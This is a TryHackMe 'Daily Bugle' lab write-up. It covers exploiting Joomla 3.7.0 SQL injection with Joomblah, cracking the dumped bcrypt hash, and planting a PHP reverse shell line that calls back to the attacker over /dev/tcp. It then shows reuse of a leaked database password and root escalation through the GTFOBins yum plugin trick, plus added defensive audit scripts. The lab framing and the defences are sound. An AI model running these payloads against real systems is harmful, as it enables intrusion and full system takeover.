Daily Bugle - TryHackMe
```text
# Nmap 7.93 scan initiated Sat Jan 28 18:23:15 2023 as: nmap -sC -sV -Pn -T4 -O -oN scans/nmap 10.10.111.176
Nmap scan report for bugle.thm (10.10.111.176)
Host is up (0.11s latency).
Not shown: 997 closed tcp ports (reset)
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 7.4 (protocol 2.0)
| ssh-hostkey:
|   2048 68ed7b197fed14e618986dc58830aae9 (RSA)
|   256 5cd682dab219e33799fb96820870ee9d (ECDSA)
|_  256 d2a975cf2f1ef5444f0b13c20fd737cc (ED25519)
80/tcp   open  http    Apache httpd 2.4.6 ((CentOS) PHP/5.6.40)
|_http-title: Home
| http-robots.txt: 15 disallowed entries
| /joomla/administrator/ /administrator/ /bin/ /cache/
| /cli/ /components/ /includes/ /installation/ /language/
|_/layouts/ /libraries/ /logs/ /modules/ /plugins/ /tmp/
|_http-server-header: Apache/2.4.6 (CentOS) PHP/5.6.40
|_http-generator: Joomla! - Open Source Content Management
3306/tcp open  mysql   MariaDB (unauthorized)
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.93%E=4%D=1/28%OT=22%CT=1%CU=36822%PV=Y%DS=4%DC=I%G=Y%TM=63D5AE8
OS:7%P=x86_64-pc-linux-gnu)SEQ(SP=FF%GCD=1%ISR=10A%TI=Z%II=I%TS=A)SEQ(SP=FF
OS:%GCD=1%ISR=10A%TI=Z%CI=I%II=I%TS=A)SEQ(SP=FF%GCD=1%ISR=10A%TI=Z%TS=A)OPS
OS:(O1=M506ST11NW7%O2=M506ST11NW7%O3=M506NNT11NW7%O4=M506ST11NW7%O5=M506ST1
OS:1NW7%O6=M506ST11)WIN(W1=68DF%W2=68DF%W3=68DF%W4=68DF%W5=68DF%W6=68DF)ECN
OS:(R=Y%DF=Y%T=40%W=6903%O=M506NNSNW7%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S+%F=A
OS:S%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T5(R
OS:=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F
OS:=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF=N%
OS:T=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=40%CD
OS:=S)
Network Distance: 4 hops
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sat Jan 28 18:23:51 2023 -- 1 IP address (1 host up) scanned in 36.56 seconds
```
OpenSSH, MariaDB (mysql), and Joomla are running on the box. The “Super User” post author and the login page stand out to me. Information at /language/en-GB/en-GB.xml shows that the site is running Joomla 3.7.0. Knowing this, I checked exploitdb:
```text
┌──(kali㉿kali)-[~/Rooms/daily-bugle]
└─$ searchsploit Joomla 3.7
------------------------------------------------------------------------ ---------------------------------
 Exploit Title                                                          |  Path
------------------------------------------------------------------------ ---------------------------------
Joomla! 3.7 - SQL Injection                                             | php/remote/44227.php
Joomla! 3.7.0 - 'com_fields' SQL Injection                              | php/webapps/42033.txt
Joomla! Component ARI Quiz 3.7.4 - SQL Injection                        | php/webapps/46769.txt
Joomla! Component com_realestatemanager 3.7 - SQL Injection             | php/webapps/38445.txt
Joomla! Component Easydiscuss < 4.0.21 - Cross-Site Scripting           | php/webapps/43488.txt
Joomla! Component J2Store < 3.3.7 - SQL Injection                       | php/webapps/46467.txt
Joomla! Component JomEstate PRO 3.7 - 'id' SQL Injection                | php/webapps/44117.txt
Joomla! Component Jtag Members Directory 5.3.7 - Arbitrary File Download | php/webapps/43913.txt
Joomla! Component Quiz Deluxe 3.7.4 - SQL Injection                     | php/webapps/42589.txt
------------------------------------------------------------------------ ---------------------------------
```
Exploit 42033 is linked to CVE-2017-8917, which eventually led me to Joomblah:
```text
┌──(venv)─(kali㉿kali)-[~/Tools/joomblah]
└─$ python2 joomblah.py http://10.10.46.252:80 | tee ~/Rooms/daily-bugle/scans/joomblah
[-] Fetching CSRF token
[-] Testing SQLi
- Found table: fb9j5_users
- Extracting users from fb9j5_users
[$] Found user ['811', 'Super User', 'jonah', 'jonah@tryhackme.com', 'bcy$2y$10$0veO/JSFh4389Lluc4Xya.dfy2MF.bZhz0jVMw.V.d3p12kBtZutm', '', '']
- Extracting sessions from fb9j5_session
```
We can crack this hash with john:

```text
Loaded 1 password hash (bcrypt [Blowfish 32/64 X3])
Cost 1 (iteration count) is 1024 for all loaded hashes
spiderman123 (?)
```
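The "Cost 1 (iteration count) is 1024" line is john reading the work factor out of the hash itself. As an added example (not part of Joomblah, john or Joomla), the parser below splits a bcrypt modular-crypt string into its variant, cost, salt and digest, derives the iteration count (2^cost), and scales a measured hash rate to that cost so a defender can see how much a higher cost buys. The 100,000 hashes/s at cost 5 reference figure and the 10,000,000-candidate wordlist size are constructed numbers, not measurements from this box; the hash constant is the one Joomblah printed above, taken from `$2y$` onward.

```python
"""Parse a bcrypt modular-crypt string and reason about its work factor.

Added example for this writeup; it is not code from Joomblah, john or Joomla.
"""
import re

# bcrypt uses its own base64 alphabet (./A-Za-z0-9), not the RFC 4648 one.
_BCRYPT_B64 = r"[./A-Za-z0-9]"
_BCRYPT_RE = re.compile(
    r"^\$(?P<variant>2[abxy]?)\$(?P<cost>\d{2})\$"
    rf"(?P<salt>{_BCRYPT_B64}{{22}})(?P<digest>{_BCRYPT_B64}{{31}})$"
)

# Hash string from the Joomblah output in this writeup, from "$2y$" onward.
JOOMBLAH_HASH = "$2y$10$0veO/JSFh4389Lluc4Xya.dfy2MF.bZhz0jVMw.V.d3p12kBtZutm"


def parse_bcrypt(mcf: str) -> dict:
    """Split a bcrypt string into variant, cost, salt and digest.

    Raises ValueError if the string is not a well-formed bcrypt hash, e.g.
    when stray characters precede the '$2y$' prefix.
    """
    m = _BCRYPT_RE.match(mcf)
    if m is None:
        raise ValueError("not a bcrypt modular-crypt string")
    cost = int(m.group("cost"))
    if not 4 <= cost <= 31:
        raise ValueError(f"bcrypt cost {cost} outside the valid range 4..31")
    return {
        "variant": m.group("variant"),
        "cost": cost,
        "iterations": 2 ** cost,  # the 'Cost 1 (iteration count)' john reports
        "salt": m.group("salt"),
        "digest": m.group("digest"),
    }


def is_bcrypt(mcf: str) -> bool:
    """True if parse_bcrypt() would accept the string."""
    try:
        parse_bcrypt(mcf)
        return True
    except ValueError:
        return False


def rate_at_cost(rate_ref: float, cost_ref: int, cost: int) -> float:
    """Scale a hash rate measured at cost_ref to another cost.

    bcrypt runs 2**cost key-setup rounds, so each +1 in cost halves the rate.
    """
    return rate_ref * 2.0 ** (cost_ref - cost)


def seconds_to_exhaust(mcf: str, candidates: int, rate_ref: float, cost_ref: int) -> float:
    """Seconds needed to try `candidates` guesses against this hash."""
    cost = parse_bcrypt(mcf)["cost"]
    return candidates / rate_at_cost(rate_ref, cost_ref, cost)


if __name__ == "__main__":
    info = parse_bcrypt(JOOMBLAH_HASH)
    print(f"variant={info['variant']} cost={info['cost']} iterations={info['iterations']}")
    # Constructed reference point: 100k hashes/s at cost 5, 10M-word list.
    for c in (10, 12):
        h = f"$2y${c:02d}$" + info["salt"] + info["digest"]
        print(f"cost {c}: {seconds_to_exhaust(h, 10_000_000, 1e5, 5):.0f} s for 10M guesses")
```

The iteration count the parser derives for cost 10 matches john's 1024, and doubling from cost 10 to 12 quadruples the time for the same wordlist, which is the lever a Joomla administrator has against offline cracking of a dumped users table.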
Now that we have the creds jonah:spiderman123, we can get on the box by logging in through /administrator and, via the templates page, inserting this into error.php:

```php
system('/bin/sh -i >& /dev/tcp/[local machine]/4000 0>&1');
```
```text
┌──(kali㉿kali)-[~/Rooms/daily-bugle]
└─$ nc -lnvp 4000
listening on [any] 4000 ...
connect to [local machine] from (UNKNOWN) [10.10.28.175] 34368
sh: no job control in this shell
sh-4.2$
```
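The foothold relies on the template editor writing a shell-execution call into a file that a presentation template never legitimately needs. As an added detection example (not Joomla's own code), the script below baselines template files by SHA-256 and, for any file that changed or is untracked, reports PHP calls that hand strings to the OS shell or evaluate code. The template path `templates/protostar/error.php` is an assumption based on the `protostar` directory visible in the shell prompt later on; the stock header lines in the sample are constructed, and the injected line is the one from this writeup.

```python
"""Flag shell-execution calls in modified Joomla template PHP files.

Added detection example for this writeup; not part of Joomla.
"""
import hashlib
import re
from typing import Dict, List, Tuple

# PHP functions that pass a string to the OS shell or evaluate PHP code.
SHELL_FUNCS = ("system", "exec", "shell_exec", "passthru", "popen", "proc_open", "eval")
# Match "system(" or "system (" but not "my_system(" or "$system(".
# PHP function names are case-insensitive, so the regex is too.
_CALL_RE = re.compile(r"(?<![\w$])(" + "|".join(SHELL_FUNCS) + r")\s*\(", re.IGNORECASE)
# The backtick operator is shell_exec in disguise.
_BACKTICK_RE = re.compile(r"`[^`]*`")


def find_shell_calls(php_source: str) -> List[Tuple[int, str]]:
    """Return (line number, function name) for every suspicious call."""
    hits: List[Tuple[int, str]] = []
    for lineno, line in enumerate(php_source.splitlines(), start=1):
        for m in _CALL_RE.finditer(line):
            hits.append((lineno, m.group(1).lower()))
        if _BACKTICK_RE.search(line):
            hits.append((lineno, "backtick"))
    return hits


def sha256_hex(data: str) -> str:
    return hashlib.sha256(data.encode()).hexdigest()


def check_templates(files: Dict[str, str], baseline: Dict[str, str]) -> Dict[str, dict]:
    """Compare template files against a baseline of SHA-256 digests.

    Files that differ from the baseline, or that the baseline does not know,
    are reported together with any shell calls in their current content.
    Unchanged files are trusted and not scanned.
    """
    report: Dict[str, dict] = {}
    for path, content in files.items():
        expected = baseline.get(path)
        if expected is None:
            report[path] = {"status": "untracked", "calls": find_shell_calls(content)}
        elif sha256_hex(content) != expected:
            report[path] = {"status": "modified", "calls": find_shell_calls(content)}
    return report


# Constructed sample: a minimal Joomla-style header, then the line this
# writeup injected through the template editor.
CLEAN_ERROR_PHP = "<?php\ndefined('_JEXEC') or die;\n$app = JFactory::getApplication();\n"
TAMPERED_ERROR_PHP = CLEAN_ERROR_PHP + "system('/bin/sh -i >& /dev/tcp/[local machine]/4000 0>&1');\n"
TEMPLATE_PATH = "templates/protostar/error.php"  # assumed path, see lead-in


def demo() -> Dict[str, dict]:
    """Baseline the clean file, then check the tampered version against it."""
    baseline = {TEMPLATE_PATH: sha256_hex(CLEAN_ERROR_PHP)}
    current = {TEMPLATE_PATH: TAMPERED_ERROR_PHP}
    return check_templates(current, baseline)


if __name__ == "__main__":
    for path, info in demo().items():
        print(f"{path}: {info['status']}, suspicious calls: {info['calls']}")
```

Run from a cron job or a file-integrity monitor, the baseline would come from a known-good install; any hit on a template file is worth an alert on its own, because the only account that can produce one through the CMS is a Super User, which is exactly the account the SQL injection above handed over.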
apache -> jjameson privesc
These users stood out to me in /etc/passwd:

```text
root:x:0:0:root:/root:/bin/bash
ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
jjameson:x:1000:1000:Jonah Jameson:/home/jjameson:/bin/bash
apache:x:48:48:Apache:/usr/share/httpd:/sbin/nologin
mysql:x:27:27:MariaDB Server:/var/lib/mysql:/sbin/nologin
```
Linpeas found a database password in a Joomla config PHP file that was also valid for jjameson:

```text
╔══════════╣ Searching passwords in config PHP files
public $password = 'nv5uz9r3ZEDzVjNu';
$this->password = (empty($this->options['db_pass'])) ? '' : $this->options['db_pass'];
$this->password = null;
'password' => $this->password,
```
```text
bash-4.2$ su jjameson
su jjameson
Password: nv5uz9r3ZEDzVjNu
[jjameson@dailybugle protostar]$
```
jjameson -> root privesc
Linpeas found a sudoers rule that lets jjameson run yum without a password:

```text
User jjameson may run the following commands on dailybugle:
    (ALL) NOPASSWD: /usr/bin/yum
```
Our privesc is the yum plugin technique from GTFOBins:

```bash
TF=$(mktemp -d)
cat >$TF/x<<EOF
[main]
plugins=1
pluginpath=$TF
pluginconfpath=$TF
EOF
cat >$TF/y.conf<<EOF
[main]
enabled=1
EOF
cat >$TF/y.py<<EOF
import os
import yum
from yum.plugins import PluginYumExit, TYPE_CORE, TYPE_INTERACTIVE
requires_api_version='2.1'
def init_hook(conduit):
    os.execl('/bin/sh','/bin/sh')
EOF
sudo yum -c $TF/x --enableplugin=y
```
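The root cause here is not a yum bug but a sudoers rule: yum loads plugins from whatever config the caller passes with -c, so `NOPASSWD: /usr/bin/yum` is root for anyone who holds the jjameson account. As an added example (not part of linpeas or GTFOBins), the audit below parses the `(runas) TAGS: command` lines that `sudo -l` prints and flags rules on binaries that can execute arbitrary code. Only yum is in the shell-equivalent set, because it is the binary this writeup covers; the `/usr/bin/systemctl restart httpd` line in the sample is a constructed benign rule to show what is not flagged.

```python
"""Audit `sudo -l` output for rules that amount to a root shell.

Added example for this writeup; it is not code from linpeas or GTFOBins.
"""
import re
from typing import Dict, List

# Binaries whose sudo rule is equivalent to running anything as root.
# Only yum is taken from this writeup; a real audit would extend the set.
SHELL_EQUIVALENT = {"/usr/bin/yum"}

_RULE_RE = re.compile(
    r"^\s*\((?P<runas>[^)]*)\)\s*"   # (ALL) or (root : root)
    r"(?P<tags>(?:[A-Z]+:\s*)*)"     # zero or more tags such as NOPASSWD:
    r"(?P<cmds>\S.*?)\s*$"           # one or more comma-separated commands
)


def parse_sudo_l(output: str) -> List[Dict]:
    """Turn `sudo -l` output into one dict per permitted command."""
    rules: List[Dict] = []
    for line in output.splitlines():
        m = _RULE_RE.match(line)
        if m is None:
            continue  # header lines such as "User jjameson may run ..."
        tags = [t.rstrip(":") for t in m.group("tags").split()]
        for cmd in m.group("cmds").split(","):
            rules.append({"runas": m.group("runas").strip(),
                          "tags": tags,
                          "command": cmd.strip()})
    return rules


def risky_rules(rules: List[Dict]) -> List[Dict]:
    """Return the rules that give the user root-equivalent execution."""
    findings: List[Dict] = []
    for r in rules:
        binary = r["command"].split()[0]
        if r["command"] == "ALL":
            reason = "any command allowed"
        elif binary in SHELL_EQUIVALENT:
            reason = f"{binary} can run arbitrary code (plugins/config)"
        else:
            continue
        # NOPASSWD removes the last control: the user's own password.
        severity = "critical" if "NOPASSWD" in r["tags"] else "high"
        findings.append({**r, "severity": severity, "reason": reason})
    return findings


# Sample input: the two lines linpeas showed in this writeup, plus one
# constructed benign rule.
SAMPLE_SUDO_L = """\
User jjameson may run the following commands on dailybugle:
    (ALL) NOPASSWD: /usr/bin/yum
    (root) /usr/bin/systemctl restart httpd
"""


def audit(output: str = SAMPLE_SUDO_L) -> List[Dict]:
    return risky_rules(parse_sudo_l(output))


if __name__ == "__main__":
    for f in audit():
        print(f"{f['severity']}: ({f['runas']}) {f['command']} - {f['reason']}")
```

The fix on the host side is to drop the rule or at least the NOPASSWD tag; restricting yum to specific arguments in sudoers does not help, since the plugin path is chosen by a config file the caller supplies.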
Hindsight
- I tried sqlmap, joomla-brute, and droopescan before using joomblah.
- I might benefit from googling more first; I found joomblah on an OSCP prep page that mentioned 3.7.0.
- I could save a lot of time by cracking hashes outside my VM, especially bcrypt.